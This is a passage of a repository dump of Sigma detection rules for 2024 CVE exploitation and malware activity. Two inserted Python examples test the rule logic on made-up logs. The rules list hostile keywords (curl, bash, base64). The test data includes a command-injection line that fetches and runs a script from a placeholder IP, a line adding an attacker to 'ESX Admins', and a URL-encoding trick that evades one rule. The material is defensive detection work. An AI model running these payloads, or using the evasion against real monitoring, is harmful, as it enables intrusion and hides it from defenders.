    "content": "title: ScreenConnect User Database Modification - Security\nid: 4109cb6a-a4af-438a-9f0c-056abba41c6f\nrelated:\n    - id: 1a821580-588b-4323-9422-660f7e131020\n      type: similar\nstatus: test\ndescription: |\n    This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.\n    This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.\n    This requires an Advanced Auditing policy that logs successful Windows Event ID 4663 events, with a SACL set on the directory.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.cve.org/CVERecord?id=CVE-2024-1709\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nauthor: Matt Anderson, Kris Luzadre, Andrew Schwartz, Huntress\ndate: 2024-02-20\ntags:\n    - attack.defense-evasion\n    - cve.2024-1709\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: SACLs must be enabled for the ScreenConnect directory'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectType: 'File'\n        AccessMask: '0x6'\n        ObjectName|endswith: '.xml'\n        ObjectName|contains|all:\n            - 'Temp'\n            - 'ScreenConnect'\n        ProcessName|contains: 'ScreenConnect.Service.exe'\n    condition: selection\nfalsepositives:\n    - This will occur legitimately as well and will result in some benign activity.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-3094/proc_creation_lnx_exploit_cve_2024_3094_sshd_child_process.yml",
    "content": "title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process\nid: 9aa27839-e8ba-4d7a-ac1a-746c22c3d1e5\nstatus: test\ndescription: |\n    Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.\nreferences:\n    - https://github.com/amlweems/xzbot?tab=readme-ov-file#backdoor-demo\nauthor: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke\ndate: 2024-04-01\nmodified: 2024-07-03\ntags:\n    - attack.execution\n    - cve.2024-3094\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith: '/sshd'\n        CommandLine|startswith:\n            - 'bash -c'\n            - 'sh -c'\n        User: 'root'\n    condition: selection\nfalsepositives:\n    - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with \"sh -c\" or \"bash -c\"\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-3400/file_event_paloalto_globalprotect_exploit_cve_2024_3400_command_inject_file_creation.yml",
    "content": "title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation\nid: bcd95697-e3e7-4c6f-8584-8e3503e6929f\nstatus: test\ndescription: |\n    Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.\n    As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.\nreferences:\n    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-04-25\ntags:\n    - attack.execution\n    - cve.2024-3400\n    - detection.emerging-threats\nlogsource:\n    product: paloalto\n    service: globalprotect\n    category: file_event\n    definition: 'Requirements: file creation events need to be ingested from the Palo Alto GlobalProtect appliance'\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '{IFS}'\n            - 'base64'\n            - 'bash'\n            - 'curl'\n            - 'http'\n        TargetFilename|startswith: '/opt/panlogs/tmp/device_telemetry/'\n    condition: selection\nfalsepositives:\n    - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-3400/paloalto_globalprotect_exploit_cve_2024_3400_command_injection.yml",
    "content": "title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection\nid: f130a5f1-73ba-42f0-bf1e-b66a8361cb8f\nstatus: test\ndescription: |\n    Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect.\n    This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.\nreferences:\n    - https://security.paloaltonetworks.com/CVE-2024-3400\n    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/\n    - https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-18\nmodified: 2025-11-22\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - cve.2024-3400\n    - detection.emerging-threats\nlogsource:\n    category: appliance\n    product: paloalto\n    service: globalprotect\n    definition: 'Requirements: Palo Alto GlobalProtect \"mp-log\" and \"gpsvc.log\" log files need to be ingested'\ndetection:\n    keywords_generic:\n        - 'failed to unmarshal session(../'\n        - 'failed to unmarshal session(./../'\n        - 'failed to unmarshal session(/..'\n        - 'failed to unmarshal session(%2E%2E%2F'\n        - 'failed to unmarshal session(%2F%2E%2E'\n        - 'failed to unmarshal session(%2E%2F%2E%2E%2F'\n        - 'failed to unmarshal session(%252E%252E%252F'\n        - 'failed to unmarshal session(%252F%252E%252E'\n        - 'failed to unmarshal session(%252E%252F%252E%252E%252F'\n    keywords_telemetry_exploit:\n        - '{IFS}'\n        - 'base64'\n        - 'bash'\n        - 'curl'\n        - 'http'\n    keywords_telemetry_path:\n        - '/opt/panlogs/tmp/device_telemetry/'\n    condition: keywords_generic or (keywords_telemetry_exploit and keywords_telemetry_path)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
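The two CVE-2024-3400 rules above are pure substring matching: Sigma keyword lists are case-insensitive `contains` tests, and the `keywords_generic` list therefore has to spell out the plain, single- and double-URL-encoded traversal prefixes by hand. The Python below is an added example, not code from the Sigma project or from Palo Alto Networks: it reproduces the condition `keywords_generic or (keywords_telemetry_exploit and keywords_telemetry_path)` over constructed log lines (the lines, the IP address and the file names are made up, not real PAN-OS output), and adds a `decoded_traversal` check that the rule does not have, to show the kind of encoding variant a static keyword list misses.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the style the rules target (not real PAN-OS logs).
SAMPLE_LINES = [
    "failed to unmarshal session(../../../../opt/panlogs/tmp/device_telemetry/minute/x)",
    "failed to unmarshal session(%2E%2E%2Fvar%2Fappweb)",        # single URL-encoded
    "failed to unmarshal session(%252E%252E%252Fvar)",           # double URL-encoded
    "failed to unmarshal session(3f1c9a2b)",                     # benign: ordinary session id
    "/opt/panlogs/tmp/device_telemetry/minute/`curl${IFS}http://198.51.100.7/x|bash`",
    "/opt/panlogs/tmp/device_telemetry/hour/device_2024-04-18.tgz",  # benign telemetry upload
]
# Mixed encoding that is NOT in the rule's list: "%2e%2e/" instead of "%2e%2e%2f".
EVASION_LINE = "failed to unmarshal session(%2e%2e/var/appweb/sslvpndocs/x)"

GENERIC_PREFIX = "failed to unmarshal session("
# The rule's keywords are "<prefix><traversal>", i.e. the traversal must follow
# the "(" directly. Lower-cased because Sigma keyword matching is case-insensitive.
GENERIC_PAYLOAD_PREFIXES = (
    "../", "./../", "/..",
    "%2e%2e%2f", "%2f%2e%2e", "%2e%2f%2e%2e%2f",
    "%252e%252e%252f", "%252f%252e%252e", "%252e%252f%252e%252e%252f",
)
TELEMETRY_PATH = "/opt/panlogs/tmp/device_telemetry/"
TELEMETRY_KEYWORDS = ("{ifs}", "base64", "bash", "curl", "http")


def matches_generic(line: str) -> bool:
    """keywords_generic: the unmarshal error followed by one of the listed traversal prefixes."""
    low = line.lower()
    idx = low.find(GENERIC_PREFIX)
    if idx < 0:
        return False
    payload = low[idx + len(GENERIC_PREFIX):]
    return payload.startswith(GENERIC_PAYLOAD_PREFIXES)


def matches_telemetry(line: str) -> bool:
    """keywords_telemetry_exploit and keywords_telemetry_path."""
    low = line.lower()
    return TELEMETRY_PATH in low and any(k in low for k in TELEMETRY_KEYWORDS)


def evaluate(line: str) -> bool:
    """condition: keywords_generic or (keywords_telemetry_exploit and keywords_telemetry_path)"""
    return matches_generic(line) or matches_telemetry(line)


def decoded_traversal(line: str) -> bool:
    """Normalisation the rule does not perform (assumption: the SIEM can pre-process
    the line): URL-decode up to three times, then look for a '../' that follows the
    opening parenthesis or a slash. Catches encodings absent from the static list."""
    s = line
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return bool(re.search(r"(^|[(/])\.\./", s))


def run(lines=SAMPLE_LINES):
    """Return (line, matched) pairs for the constructed samples."""
    return [(ln, evaluate(ln)) for ln in lines]


if __name__ == "__main__":
    for ln, hit in run():
        print("ALERT " if hit else "      ", ln)
    print("evasion line, rule:", evaluate(EVASION_LINE), "after decoding:", decoded_traversal(EVASION_LINE))
```

The `EVASION_LINE` shows the practical limit of the rule as written: it does not match because `%2e%2e/` is not one of the nine listed spellings, while the decoded check catches it. Whether to add such a normalisation step depends on the backend; the Sigma rule itself stays a keyword list.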
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-35250/image_load_exploit_cve_2024_35250_privilege_escalation.yml",
    "content": "title: Potential CVE-2024-35250 Exploitation Activity\nid: 17ce9373-2163-4a2c-90ba-f91e9ef7a8c1\nstatus: experimental\ndescription: |\n    Detects potentially suspicious loading of \"ksproxy.ax\", which may indicate an attempt to exploit CVE-2024-35250.\nreferences:\n    - https://thehackernews.com/2024/12/cisa-and-fbi-raise-alerts-on-exploited.html\n    - https://github.com/varwara/CVE-2024-35250\n    - https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog\nauthor: '@eyezuhk Isaac Fernandes'\ndate: 2025-02-19\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2024-35250\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\ksproxy.ax'\n    filter_main_system_paths:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_teams:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n    filter_optional_zoom:\n        Image|endswith: '\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe'\n    filter_optional_firefox:\n        Image|endswith: '\\AppData\\Local\\Mozilla Firefox\\firefox.exe'\n    filter_optional_chrome:\n        Image|endswith: '\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_opera:\n        Image|endswith: '\\AppData\\Local\\Programs\\Opera\\opera.exe'\n    filter_optional_discord:\n        Image|endswith: '\\AppData\\Local\\Discord\\app-*\\Discord.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications that use Windows Stream Interface APIs.\n    - Media applications that use DirectShow filters.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-37085/proc_creation_win_exploit_cve_2024_37085_esxi_admins_group_creation.yml",
    "content": "title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group\nid: c408acfe-2870-41df-8d2f-9f4daa4555ed\nstatus: test\ndescription: |\n    Detects execution of \"net.exe\" or of the PowerShell \"New-ADGroup\" cmdlet in order to add a group named \"ESX Admins\".\n    This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor.\n    VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/\nauthor: frack113\ndate: 2024-07-29\ntags:\n    - attack.execution\n    - cve.2024-37085\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_net_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_net_cmd:\n        CommandLine|contains|all:\n            - '/add'\n            - '/domain'\n            - 'ESX Admins'\n            - 'group'\n    selection_powershell_img:\n        - Image|endswith:\n              - '\\PowerShell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.exe'\n              - 'pwsh.dll'\n    selection_powershell_cli:\n        CommandLine|contains|all:\n            - 'New-ADGroup'\n            - 'ESX Admins'\n    condition: all of selection_net_* or all of selection_powershell_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-37085/win_security_exploit_cve_2024_37085_esxi_admins_group.yml",
    "content": "title: Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity\nid: 47a1658b-67a4-48e2-8ab1-c10437fc0148\nstatus: test\ndescription: |\n    Detects the creation of, or a membership change to, a Windows domain group named \"ESX Admins\".\n    This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor.\n    VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-30\ntags:\n    - attack.execution\n    - cve.2024-37085\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4727 # A security-enabled global group was created\n            - 4728 # A member was added to a security-enabled global group\n            - 4731 # A security-enabled local group was created\n            - 4737 # A security-enabled global group was changed\n            - 4754 # A security-enabled universal group was created\n            - 4755 # A security-enabled universal group was changed\n            - 4756 # A member was added to a security-enabled universal group\n    keyword_group:\n        - 'ESX Admins'\n    condition: selection and keyword_group\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
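The two CVE-2024-37085 rules above combine a few Sigma semantics that are easy to get wrong when porting them by hand: a list of maps under one selection (`selection_net_img`) is an OR of its entries, `|contains|all` requires every listed string, plain field matches are case-insensitive, and a bare `keyword_group` searches the whole event rather than one field. The Python below is an added example, not code from the Sigma project: it evaluates both rules over constructed process-creation and Security events (the user names, paths and command lines are made up) so the behaviour on renamed binaries and on non-group events can be checked directly.

```python
# Constructed sample events (not real telemetry). Field names follow the Sigma
# process_creation and windows/security taxonomies the two rules use.
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\net.exe", "OriginalFileName": "net.exe",
     "CommandLine": 'net group "ESX Admins" /add /domain'},
    {"Image": r"C:\Windows\System32\net1.exe", "OriginalFileName": "net1.exe",
     "CommandLine": 'net1 group "ESX Admins" attacker /add /domain'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell -c New-ADGroup -Name "ESX Admins" -GroupScope Global'},
    {"Image": r"C:\Windows\System32\net.exe", "OriginalFileName": "net.exe",
     "CommandLine": 'net group "Domain Admins" /domain'},        # benign enumeration: no /add
    {"Image": r"C:\Users\bob\renamed.exe", "OriginalFileName": "net.exe",
     "CommandLine": 'renamed group "ESX Admins" /add /domain'},   # renamed net.exe, caught via OriginalFileName
]

SECURITY_EVENTS = [
    {"EventID": 4727, "TargetUserName": "ESX Admins", "SubjectUserName": "attacker"},
    {"EventID": 4728, "TargetUserName": "Domain Admins", "MemberName": "CN=bob"},
    {"EventID": 4720, "TargetUserName": "ESX Admins"},   # user creation: not one of the group event IDs
]


# Sigma string matching is case-insensitive; these helpers mirror the modifiers used.
def ieq(value, wanted):
    return value.lower() == wanted.lower()


def icontains(hay, needle):
    return needle.lower() in hay.lower()


def iendswith(hay, suffix):
    return hay.lower().endswith(suffix.lower())


def proc_rule(ev):
    """proc_creation_win_exploit_cve_2024_37085_esxi_admins_group_creation.yml"""
    image, orig, cli = ev.get("Image", ""), ev.get("OriginalFileName", ""), ev.get("CommandLine", "")
    # A list of maps under one selection is an OR: Image|endswith ... OR OriginalFileName ...
    net_img = any(iendswith(image, s) for s in ("\\net.exe", "\\net1.exe")) or \
              any(ieq(orig, s) for s in ("net.exe", "net1.exe"))
    net_cmd = all(icontains(cli, s) for s in ("/add", "/domain", "ESX Admins", "group"))
    ps_img = any(iendswith(image, s) for s in ("\\PowerShell.exe", "\\pwsh.exe")) or \
             any(ieq(orig, s) for s in ("PowerShell.exe", "pwsh.dll"))
    ps_cli = all(icontains(cli, s) for s in ("New-ADGroup", "ESX Admins"))
    # condition: all of selection_net_* or all of selection_powershell_*
    return (net_img and net_cmd) or (ps_img and ps_cli)


GROUP_EVENT_IDS = {4727, 4728, 4731, 4737, 4754, 4755, 4756}


def security_rule(ev):
    """win_security_exploit_cve_2024_37085_esxi_admins_group.yml"""
    # keyword_group is a full-event keyword search: any string field may carry the name.
    return ev.get("EventID") in GROUP_EVENT_IDS and \
        any(isinstance(v, str) and icontains(v, "ESX Admins") for v in ev.values())


def run_process(events=PROCESS_EVENTS):
    return [proc_rule(ev) for ev in events]


def run_security(events=SECURITY_EVENTS):
    return [security_rule(ev) for ev in events]


if __name__ == "__main__":
    for ev, hit in zip(PROCESS_EVENTS, run_process()):
        print("ALERT " if hit else "      ", ev["CommandLine"])
    for ev, hit in zip(SECURITY_EVENTS, run_security()):
        print("ALERT " if hit else "      ", ev["EventID"], ev["TargetUserName"])
```

The fourth process event (plain `net group "Domain Admins" /domain`) shows why `/add` is in the `|contains|all` list: enumeration alone does not fire. The last one shows the value of `OriginalFileName` as an alternative to `Image`: a copied or renamed `net.exe` still carries its original file name in the PE version resource.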
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-49113/win_application_error_exploit_cve_2024_49113_ldap_nightmare.yml",
    "content": "title: CVE-2024-49113 Exploitation Attempt - LDAP Nightmare\nid: 3f2c93c7-7b2a-4d58-bb8d-6f39422d8148\nstatus: experimental\ndescription: |\n    Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on \"Application Error\" log where the faulting application is \"lsass.exe\" and the faulting module is \"WLDAP32.dll\".\nreferences:\n    - https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7\n    - https://www.linkedin.com/feed/update/urn:li:activity:7282295814792605698/\nauthor: Samuel Monsempes\ndate: 2025-01-08\ntags:\n    - attack.impact\n    - attack.t1499\n    - cve.2024-49113\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'Application Error'\n        EventID: 1000\n        Data|contains|all:\n            - 'lsass.exe'\n            - 'WLDAP32.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-50623/proc_creation_win_exploit_cve_2024_50623_cleo.yml",
    "content": "title: CVE-2024-50623 Exploitation Attempt - Cleo\nid: f007b877-02e3-45b7-8501-1b78c2864029\nstatus: experimental\ndescription: |\n    Detects exploitation attempts of Cleo's CVE-2024-50623 by looking for a \"cmd.exe\" process spawned by the Cleo software suite (Harmony, LexiCom, VLTrader) with a suspicious PowerShell command line.\nreferences:\n    - https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild\nauthor: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson\ndate: 2024-12-09\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1190\n    - cve.2024-50623\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\javaw.exe'\n        ParentCommandLine|contains:\n            - 'Harmony'\n            - 'lexicom'\n            - 'VersaLex'\n            - 'VLTrader'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - 'powershell'\n            - ' -enc '\n            - ' -EncodedCommand'\n            - '.Download'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/CSharp-Streamer/image_load_malware_csharp_streamer_dotnet_load.yml",
    "content": "title: Potential CSharp Streamer RAT Loading .NET Executable Image\nid: 6f6afac3-8e7a-4e4b-9588-2608ffe08f82\nstatus: test\ndescription: |\n    Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.\nreferences:\n    - https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/#detections\n    - https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\nauthor: Luca Di Bartolomeo\ndate: 2024-06-22\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|re: '\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_save_temp.yml",
    "content": "title: DarkGate - Drop DarkGate Loader In C:\\Temp Directory\nid: df49c691-8026-48dd-94d3-4ba6a79102a8\nstatus: test\ndescription: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\\temp folder.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/\n    - https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html\nauthor: Tomasz Dyduch, Josh Nickels\ndate: 2024-05-31\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_filename_suffix:\n        TargetFilename|contains: ':\\temp\\'\n        TargetFilename|endswith:\n            - '.au3'\n            - '\\autoit3.exe'\n    selection_image_suffix:\n        Image|contains: ':\\temp\\'\n        Image|endswith:\n            - '.au3'\n            - '\\autoit3.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely legitimate usage of AutoIT in temp folders.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Generic/file_event_win_malware_generic_creation_configuration_rats.yml",
    "content": "title: File Creation Related To RAT Clients\nid: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d\nstatus: experimental\ndescription: |\n    Detects the creation of a \".conf\" configuration file, in paths under \"AppData\\Roaming\", that was observed being created by VenomRAT, AsyncRAT and Lummac samples in the wild.\nreferences:\n    - https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761\n    - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-12-19\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    # VT Query: behaviour_files:\"\\\\AppData\\\\Roaming\\\\DataLogs\\\\DataLogs.conf\"\n    # VT Query: behaviour_files:\"DataLogs.conf\" or behaviour_files:\"hvnc.conf\" or behaviour_files:\"dcrat.conf\"\n    selection_required:\n        TargetFilename|contains: '\\AppData\\Roaming\\'\n    selection_variants:\n        TargetFilename|contains:\n            - '\\mydata\\'\n            - '\\datalogs\\'\n            - '\\hvnc\\'\n            - '\\dcrat\\'\n        TargetFilename|endswith:\n            - '\\datalogs.conf'\n            - '\\hvnc.conf'\n            - '\\dcrat.conf'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate software creating a file with the same name\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/KamiKakaBot/proc_creation_win_malware_kamikakabot_lnk_lure_execution.yml",
    "content": "title: Potential KamiKakaBot Activity - Lure Document Execution\nid: 24474469-bd80-46cc-9e08-9fbe81bfaaca\nstatus: test\ndescription: |\n    Detects the execution of a Word document via the WinWord Start Menu shortcut.\n    This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.\nreferences:\n    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2024-03-22\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/c '\n            - '.lnk ~'\n            - 'Start Menu\\Programs\\Word'\n        CommandLine|endswith: '.doc'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/KamiKakaBot/proc_creation_win_malware_kamikakabot_schtasks_persistence.yml",
    "content": "title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation\nid: fe9e8ba9-4419-41e6-a574-bd9f7b3af961\nstatus: test\ndescription: |\n    Detects the creation of a scheduled task that runs weekly and executes the \"shutdown /l /f\" command.\n    This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.\nreferences:\n    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/\n    - https://tria.ge/240123-rapteaahhr/behavioral1\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2024-03-22\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - ' /create '\n            - 'shutdown /l /f'\n            - 'WEEKLY'\n    filter_main_system_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/KamiKakaBot/registry_set_malware_kamikakabot_winlogon_persistence.yml",
    "content": "title: Potential KamiKakaBot Activity - Winlogon Shell Persistence\nid: c9b86500-1ec2-4de6-9120-d744c8fb5caf\nstatus: test\ndescription: |\n    Detects changes to the \"Winlogon\" registry key where a process will set the value of the \"Shell\" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.\nreferences:\n    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior\ndate: 2024-03-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n        Details|contains|all:\n            - '-nop -w h'\n            - '$env'\n            - 'explorer.exe'\n            - 'Start-Process'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Lummac-Stealer/proc_creation_win_malware_lummac_more_vbc.yml",
    "content": "title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe\nid: 19b3806e-46f2-4b4c-9337-e3d8653245ea\nstatus: experimental\ndescription: |\n    Detects the execution of more.com and vbc.exe in the process tree.\n    This behavior was observed by a set of samples related to Lummac Stealer.\n    The Lummac payload is injected into the vbc.exe process.\nreferences:\n    - https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files\n    - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef\n    - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html\n    - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-12-19\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # VT Query: behaviour_processes:\"C:\\\\Windows\\\\SysWOW64\\\\more.com\" behaviour_processes:\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\vbc.exe\"\n    selection_parent:\n        ParentImage|endswith: '\\more.com'\n    selection_child:\n        - Image|endswith: '\\vbc.exe'\n        - OriginalFileName: 'vbc.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Raspberry-Robin/image_load_malware_raspberry_robin_side_load_aclui_oleview.yml",
